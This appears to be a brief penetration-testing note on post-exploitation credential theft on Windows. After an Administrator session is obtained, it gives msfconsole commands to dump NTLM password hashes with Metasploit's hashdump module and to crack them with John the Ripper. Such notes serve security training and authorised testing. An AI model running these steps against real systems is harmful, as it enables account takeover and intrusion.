
retrieving_passwords

Once we are Administrator, it may be important to retrieve the passwords. To do this, we can either use hashdump from Meterpreter (but this won't always work) or run the following from msfconsole:

use post/windows/gather/hashdump
options
set session 1
run

At this point we can use John the Ripper to crack these password hashes. Note that John the Ripper is also available from within Metasploit (jtr). These are NTLM hashes, and we can try to crack them quickly with Metasploit by doing:

use auxiliary/analyze/jtr_crack_fast
set session 1
options
run